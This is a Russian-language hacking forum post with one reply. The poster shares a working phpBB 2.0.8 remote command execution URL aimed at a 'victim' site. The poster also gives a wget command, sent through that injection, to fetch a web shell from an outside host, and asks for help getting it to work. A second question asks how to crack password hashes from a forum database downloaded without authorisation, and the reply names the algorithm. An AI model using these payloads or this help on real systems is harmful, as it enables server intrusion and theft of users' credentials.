Прошу прощение за небольшое повторение, у меня 2 проблемы: 1. Есть форум на дырявом движке PHPBB 2.0.8 Эксплойт для SQL Injection прокатывает. Вот он: www.victim.ru/forum/viewtopic.php?xxx=/*здесь команда*/&p=12&highlight=%2527.system($_GET[xxx]).include%2527 Так вот, работает большинство команд (ls выдает содержимое, pwd говорит мне о моем месторасположении), однако невозможно закачать шелл с сайта (допустим, http://myshell.narod.ru/shell.php) т.е. я набираю в браузере viewtopic.php?xxx=wget http://myshell.narod.ru/shell.php&p=12&highlight=%2527.system($_GET[xxx]).include%2527 Затем, обращаюсь к шеллу: www.victim.ru/forum/shell.php и получаю ошибку 404. Нет такого файла на сервере. Такая ситуация встретилась на двух серверах. Обе машины под управлением FreeBSD, о чем говорит uname. С чем это может быть связано, и может, кто-то сможет мне указать на ошибки в эксплуатации этой уязвимости)) 2. Удалось скачать базу данных с одного форума от web wiz 2.0.7 (/admin/database/wwForum.mdb) Каким алгоритмом хешируются пароли в этой базе? Есть подозрение, что это SHA-1, так как PasswordPRO наиболее корректно отображает хеши из базы именно, как SHA-1 хеши. Это так?
Да, это SHA-1. А с 4его ты взял, 4то PP коректно с ними работает? он только с md4,md5 и мускульными хэшами работает!